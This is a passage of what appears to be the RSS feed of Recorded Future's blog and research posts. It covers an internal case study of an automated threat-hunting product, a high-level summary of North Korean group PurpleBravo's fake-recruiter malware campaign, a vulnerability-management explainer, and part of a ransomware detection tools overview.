            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li>Recorded Future deployed Autonomous Threat Operations within its own SOC before customer release, ensuring real-world effectiveness and identifying critical capabilities.</li>
          <li>Autonomous Threat Operations reduced analyst-dependent, inconsistent processes, creating standardized hunts that deliver the same input, output, and expectations every time.</li>
          <li>Team members now run 15-20 threat hunts weekly—work that previously required days or weeks of manual research, coordination, and planning.</li>
          <li>During the Salt Typhoon campaign, Recorded Future's CISO launched a comprehensive network-wide threat hunt in five minutes between meetings, enabling immediate risk mitigation.</li>
          <li>A single pane of glass eliminates context-switching across multiple tools, allowing analysts to hunt threats and research IOCs within one platform.</li>
        </ul>
        <h2>Autonomous Threat Operations in action: Real results from Recorded Future’s own SOC team</h2>
        <p>The ultimate test of any cybersecurity solution Recorded Future builds? Using it to defend our own network.</p>
        <p>That's exactly what we did with Autonomous Threat Operations. Before rolling it out to customers, we became Customer Zero, deploying the technology within our security operations organization to see if it could truly transform the way security teams hunt for threats.</p>
        <p>The results exceeded our expectations. What we discovered wasn't just incremental improvement; it was a fundamental shift in what our security team could accomplish.</p>
        <h2><strong>The challenge: Inconsistent and analyst-dependent threat hunting</strong></h2>
        <p>Prior to implementing Autonomous Threat Operations, we faced the same threat hunting challenges many security teams struggle with today. As Josh Gallion, Recorded Future's Incident Response Manager, explains: "Before using Autonomous Threat Operations, our approach to threat hunting was more piecemeal and unique to each analyst. It varied based on whatever they were comfortable with and however they were trained on the tooling."</p>
        <div>
          <div>
            <div>c4yy0f6y1p</div>
          </div>
        </div>
        <p>This inconsistency meant that the quality and thoroughness of our threat hunts varied significantly by analyst. And since each team member had different strengths, different levels of experience, and different comfort levels with our security tools, we struggled to standardize the process.</p>
        <h2><strong>The transformation: Unified, repeatable threat hunting</strong></h2>
        <p>Autonomous Threat Operations leveled the playing field immediately. "It unifies the hunting capability and makes it so that every time analysts run a hunt, it's the same," says Gallion. "We get the same input, we get the same output, and we know what to expect."</p>
        <p>The implementation was remarkably straightforward. "When we turned it on, it just was a simple connection to our Splunk environment," he says. "And once the team started using it, we could see an increase in the number of threat hunts each user would do."</p>
        <p>Perhaps most importantly, Autonomous Threat Operations enabled our team to shift from reactive, manual hunting to proactive, automated operations. "Now we can schedule hunts that will continuously run over time, update with the threat actor TTPs, and give us a more holistic view," Gallion says. "Before, we had to have an analyst get back into the product and look for new IOCs to run. Now it just runs it automatically and we know that that's taken care of."</p>
        <h2><strong>Real-world impact: Upskilling junior analysts and enabling rapid response</strong></h2>
        <p>According to Recorded Future's CISO, Jason Steer, the true value of Autonomous Threat Operations became clear through two significant outcomes.</p>
        <p>First, the technology dramatically upskilled our junior staff. In traditional manual workflows, preparing to run a single threat hunt could take days or even weeks—requiring extensive research, coordination, and planning.</p>
        <p>Today, our junior analysts are running 15–20 threat hunts each week to identify high-priority threats. This isn't just about quantity; it's about empowering less experienced team members to contribute meaningfully to our defense posture while accelerating their professional development.</p>
        <div>
          <div>
            <div>sn9crhxmaj</div>
          </div>
        </div>
        <p>Gallion sees this impact firsthand. "We have newer analysts who can do more advanced hunting based on IOCs, and it does it for them automatically in the background,” he says. “We get our results, and then they can do research in the app to shore up the findings."</p>
        <p>Second, the speed and accessibility of automated threat hunting has proven invaluable during critical moments. When Steer read about Salt Typhoon making its way into corporate networks, he didn't need to schedule a meeting, assemble a team, or wait for the next sprint cycle. In the five minutes between meetings, he was able to launch a comprehensive threat hunt across Recorded Future's entire network to identify and mitigate associated risks to our systems.</p>
        <p>That kind of rapid response would have been impossible with manual processes—and in today's threat landscape, that speed can mean the difference between containment and catastrophe.</p>
        <h2><strong>The advantage of a single pane of glass</strong></h2>
        <p>Another key benefit emerged around workflow efficiency. "Having a single pane of glass makes it a lot easier for an analyst to do not just the threat hunt, but also to see the meaning behind the IOCs that they're pulling back into the app," says Gallion. "Analysts don't like to have to get into a whole bunch of different applications. If we don't have to, it speeds things up and we can add context from inside the app."</p>
        <p>This unified approach has eliminated the context-switching and tool-juggling that had often slowed down our security team and led to missed findings.</p>
        <h2><strong>Why the Customer Zero experience matters</strong></h2>
        <p>Serving as Customer Zero validated what we believed Autonomous Threat Operations could deliver to every customer: consistent, repeatable threat hunting that empowers analysts of all skill levels to defend their organizations more effectively. By testing the new solution within our own security operations first, we were able to identify what works, refine the capabilities that matter most, and prove that Autonomous Threat Operations isn't just a theoretical improvement—it's a practical solution that transforms daily security operations.</p>
        <p>Gallion sums it up this way: "Some of the aspects of Autonomous Threat Operations that'll have the biggest impact are the repeatability, the scheduling of threat hunts to happen over time, and the single pane of glass that allows analysts to research IOCs in the app without having to go into multiple tools."</p>
        <p>We saw a need for Autonomous Threat Operations, so we built it. Being Customer Zero enabled us to test it, refine it, and ensure that it’s the best possible solution to help our customers enter the era of the autonomous SOC.</p>
        <p><strong>Learn more about Autonomous Threat Operations by clicking</strong> <strong><a href="https://www.recordedfuture.com/products/autonomous-threat-operations">here</a>, or start operationalizing your threat intelligence now by booking a</strong> <strong><a href="https://go.recordedfuture.com/ato-demo.html?__utma=150831654.1091255729.1769524153.1769524153.1769524153.1&amp;__utmb=150831654.0.10.1769524153&amp;__utmc=150831654&amp;__utmx=-&amp;__utmz=150831654.1769524153.1.1.utmcsr=(direct)%7Cutmccn=(direct)%7Cutmcmd=(none)&amp;__utmv=-&amp;__utmk=14649591">custom demo</a>.</strong></p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1a3ded09023847b846727759f0086351655ddf92a.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[PurpleBravo’s Targeting of the IT Software Supply Chain]]></title>
            <link>https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/purplebravos-targeting-it-software-supply-chain</guid>
            <pubDate>Wed, 21 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Discover how PurpleBravo, a North Korean threat group, exploits fake job offers to target software supply chains, using RATs and infostealers like BeaverTail.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>PurpleBravo is a North Korean state-sponsored threat group that overlaps with the “Contagious Interview” campaign first documented in November 2023. It targets software developers, especially in the software development and cryptocurrency verticals, via fake recruiter outreach, interview coding tests, and ClickFix prompts. Activity throughout 2025 has linked multiple fraudulent LinkedIn personas to PurpleBravo through malicious GitHub repositories and fictitious lure brands. The group’s tool set includes BeaverTail (a JavaScript infostealer and loader) and multi-platform remote access trojans (RATs), specifically, PyLangGhost and GolangGhost, optimized for stealing browser credentials and cryptocurrency wallet information.</p>
        <p>Based on Recorded Future® Network Intelligence, Insikt Group identified 3,136 individual IP addresses concentrated in South Asia and North America linked to likely targets of PurpleBravo activity from August 2024 to September 2025. Twenty potential victim organizations were observed across the AI, cryptocurrency, financial services, IT services, marketing, and software development verticals in Europe, South Asia, the Middle East, and Central America. In several cases, it is likely that job-seeking candidates executed malicious code on corporate devices, creating organizational exposure beyond the individual target. Insikt Group observed PurpleBravo administering command-and-control (C2) servers via Astrill VPN and from IP ranges in China, with BeaverTail and GolangGhost C2 servers hosted across seventeen distinct providers.</p>
        <p>Insikt Group distinguishes PurpleBravo (Contagious Interview) from PurpleDelta (North Korean IT workers) but has documented meaningful intersections. This includes a likely PurpleBravo operator displaying activity consistent with North Korean IT worker behavior, IP addresses in Russia linked to North Korean IT workers communicating with PurpleBravo C2 servers, and administration traffic from the same Astrill VPN IP address associated with PurpleDelta activity.</p>
        <p>PurpleBravo presents an overlooked threat to the IT software supply chain. Because many targets are in the IT services and staff-augmentation industries with large public customer bases, compromises can propagate downstream to their customers. This campaign poses an acute software supply-chain risk to organizations that outsource development, particularly in regions where PurpleBravo concentrates its fictitious recruitment efforts.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>PurpleBravo employs a combination of fictitious personas, organizations, and websites to distribute malware to unsuspecting job seekers in the software development industry. Candidates sometimes use their corporate devices, thereby compromising their employers' security.</li>
          <li>PurpleBravo uses a variety of custom and open-source malware and tools in its operations, including BeaverTail, InvisibleFerret, GolangGhost, and PylangGhost.</li>
          <li>Using Recorded Future Network Intelligence, Insikt Group identified 3,136 individual IP addresses linked to likely targets of PurpleBravo activity and twenty potential victim organizations in the AI, cryptocurrency, financial services, IT services, marketing, and software development industries.</li>
          <li>Insikt Group has observed multiple points of overlap between PurpleBravo and PurpleDelta, Recorded Future’s designation for North Korean IT workers, indicating that some individuals may be active in both operations.</li>
          <li>PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1bf59fb2748dede14af5b52ad8cb001808918b07e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat and Vulnerability Management in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/threat-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/threat-and-vulnerability-management</guid>
            <pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li><strong>Traditional vulnerability management tools can no longer keep up</strong> with the speed of modern exploitation—threat context is now mandatory.</li>
          <li><strong>Threat and Vulnerability Management (TVM) systems</strong> unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.</li>
          <li><strong>Static CVSS scores fail to reflect exploitation likelihood</strong>; intelligence-driven, dynamic risk scoring is essential in 2026.</li>
          <li><strong>Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste</strong>, enhancing detection and remediation while reducing alert fatigue.</li>
        </ul>
        <h2>Why Threat and Vulnerability Management Must Evolve in 2026</h2>
        <p>Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.</p>
        <p>Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.</p>
        <p>Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.</p>
        <p>In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using <a href="https://www.recordedfuture.com/threat-intelligence">intelligence-driven TVM systems</a>.</p>
        <h2>The Core Problem: Alert Fatigue and Prioritization Failure</h2>
        <p>As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.</p>
        <p>Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these <a href="https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge">challenges of prioritization</a>. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.</p>
        <p>However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:</p>
        <ul>
          <li>Is exploit code available?</li>
          <li>Is the vulnerability actively exploited?</li>
          <li>Are threat actors discussing or operationalizing it?</li>
        </ul>
        <p>As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.</p>
        <p>At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.</p>
        <p>Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:</p>
        <ul>
          <li>Operational drag and burnout</li>
          <li>Delayed remediation of truly dangerous vulnerabilities</li>
          <li>Increased business risk despite increased effort</li>
          <li>Fractured security operations</li>
        </ul>
        <p>Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.</p>
        <h2>The Evolving Threat Landscape Demands a New Approach</h2>
        <p>Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.</p>
        <p>Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.</p>
        <p>At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an <a href="https://www.recordedfuture.com/blog/threat-intelligence-and-vulnerability-management">integrated approach</a> between the two.</p>
        <p>In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.</p>
        <h2>What Is Threat and Vulnerability Management (TVM)?</h2>
        <p>Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:</p>
        <ul>
          <li>Active exploitation</li>
          <li>Threat actor behavior</li>
          <li>Asset criticality</li>
        </ul>
        <p>TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.</p>
        <p>This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.</p>
        <h2>The Five Core Pillars of Modern TVM Systems</h2>
        <p>As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.</p>
        <p><strong>1. Continuous Asset Discovery &amp; Inventory</strong></p>
        <p>Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.</p>
        <p>Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.</p>
        <p><strong>2. Vulnerability Assessment &amp; Scoring</strong></p>
        <p>TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.</p>
        <p><strong>3. External Threat Context Enrichment</strong></p>
        <p>This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.</p>
        <p>Vulnerabilities are mapped to known threat actors, active exploitation, and <a href="https://attack.mitre.org/">MITRE ATT&amp;CK®</a> techniques, ultimately transforming raw findings into actionable intelligence.</p>
        <p><strong>4. Risk-Based Prioritization (RBVM)</strong></p>
        <p>Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.</p>
        <p><strong>5. Automated Remediation &amp; Verification</strong></p>
        <p>Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.</p>
        <p>These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.</p>
        <h2>Stop Patching Everything — Use Intelligence to Prioritize Real Risk</h2>
        <p>The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.</p>
        <p>Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.</p>
        <p>Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.</p>
        <p>The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.</p>
        <h2>See Your Risk Like an Attacker: The Full Attack Surface View</h2>
        <p>In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.</p>
        <ol>
          <li><strong>The Visibility Gap:</strong> Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.</li>
          <li><strong>Attack Surface Intelligence Explained:</strong> Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.</li>
          <li><strong>Connecting the Dots with Vulnerability Tools:</strong> When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.</li>
        </ol>
        <h2>Three Strategic Recommendations for Security Leaders</h2>
        <p>Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.</p>
        <p><strong>1. Bridge the Gap Between Security and IT</strong></p>
        <p>Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.</p>
        <p><strong>2. Embrace Automation and Workflow Integration</strong></p>
        <p>Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.</p>
        <p><strong>3. Measure What Matters — Time-to-Remediate (TTR)</strong></p>
        <p>Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.</p>
        <h2>The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy</h2>
        <p>Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.</p>
        <p>Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.</p>
        <p>Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.</p>
        <p>By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the primary difference between a Vulnerability and a Threat?</h3>
              <p>A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the biggest challenge facing traditional vulnerability management programs today?</h3>
              <p>The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Why is integrating external threat intelligence mandatory for TVM in 2026?</h3>
              <p>External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future Vulnerability Intelligence help with prioritization?</h3>
              <p>Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is Attack Surface Intelligence, and what role does it play in TVM?</h3>
              <p>Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?</h3>
              <p>While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization. The modern TVM cycle is typically:</p>
              <ul>
                <li>Identify Assets</li>
                <li>Scan for Vulnerabilities</li>
                <li>Enrich with Threat Context</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1db30163db7f6aa5dca641559f3f07e312ffaeda4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Best Ransomware Detection Tools]]></title>
            <link>https://www.recordedfuture.com/blog/best-ransomware-detection-tools</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/best-ransomware-detection-tools</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.</li>
          <li>The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.</li>
          <li>Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.</li>
          <li>Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.</li>
        </ul>
        <h2>Introduction</h2>
        <p>The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.</p>
        <p>The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the <a href="https://www.verizon.com/business/resources/Ta64/reports/2025-dbir-data-breach-investigations-report.pdf">2025 Verizon Data Breach Investigations Report</a>. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.</p>
        <p>This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).</p>
        <p>The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.</p>
        <p>The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.</p>
        <h2>The Ransomware Detection Tool Landscape: Three Pillars of Defense</h2>
        <p>Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.</p>
        <h3>1. Endpoint and Extended Detection and Response (EDR/XDR) Tools</h3>
        <p>EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.</p>
        <p><strong>Core Functionality</strong></p>
        <p>EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.</p>
        <p><strong>How Threat Intelligence Enhances EDR/XDR</strong></p>
        <p>Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>CrowdStrike Falcon</strong> delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.</li>
          <li><strong>Microsoft Defender XDR</strong> integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.</li>
          <li><strong>SentinelOne</strong> employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.</li>
        </ul>
        <h3>2. Network Detection and Response (NDR) Tools</h3>
        <p>While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.</p>
        <p><strong>Core Functionality</strong></p>
        <p>NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.</p>
        <p><strong>How Threat Intelligence Improves NDR and Deception</strong></p>
        <p>Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Vectra AI</strong> specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.</li>
          <li><strong>ExtraHop Reveal(x)</strong> provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.</li>
          <li><strong>Illusive (now part of Zscaler)</strong> deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.</li>
        </ul>
        <h3>3. Threat Intelligence Tools</h3>
        <p>The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.</p>
        <p><strong>Core Functionality</strong></p>
        <p>Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.</p>
        <p><strong>How Threat Intelligence Strengthens Ransomware Detection</strong></p>
        <p>These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:</p>
        <ul>
          <li><strong>Threat Mapping:</strong> Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.</li>
          <li><strong>Infrastructure Tracking:</strong> Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.</li>
          <li><strong>Variant Identification:</strong> Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.</li>
          <li><strong>Exploitation Intelligence:</strong> Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.</li>
